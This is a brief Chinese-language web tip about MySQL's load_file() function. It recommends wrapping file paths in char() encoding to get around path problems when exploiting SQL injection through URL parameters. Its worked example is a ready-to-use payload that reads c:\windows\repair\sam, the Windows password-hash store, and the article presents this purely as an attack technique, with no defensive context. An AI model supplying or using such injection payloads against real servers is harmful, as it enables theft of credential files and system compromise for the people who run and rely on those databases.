利用load_file函数能够获取中文/特殊字符命名的服务器文件

mysql load_file函数语法

MySQL的load_file函数能够获取服务器文件,但是对于中文文件名或者含特殊字符的路径在某种情况下则会出错.

如: 在mysql注入的时候, 希望通过url get的方式传递路径.


这个时候可以利用char()函数, 如: 

load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109))

其中 char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109) 是c:\windows\repair\sam的ASC编码



欢迎转载,转载请注明来自一手册:http://yishouce.com/article/4.html
友情链接It题库(ittiku.com)| 版权归yishouce.com所有| 友链等可联系 admin#yishouce.com|粤ICP备16001685号-1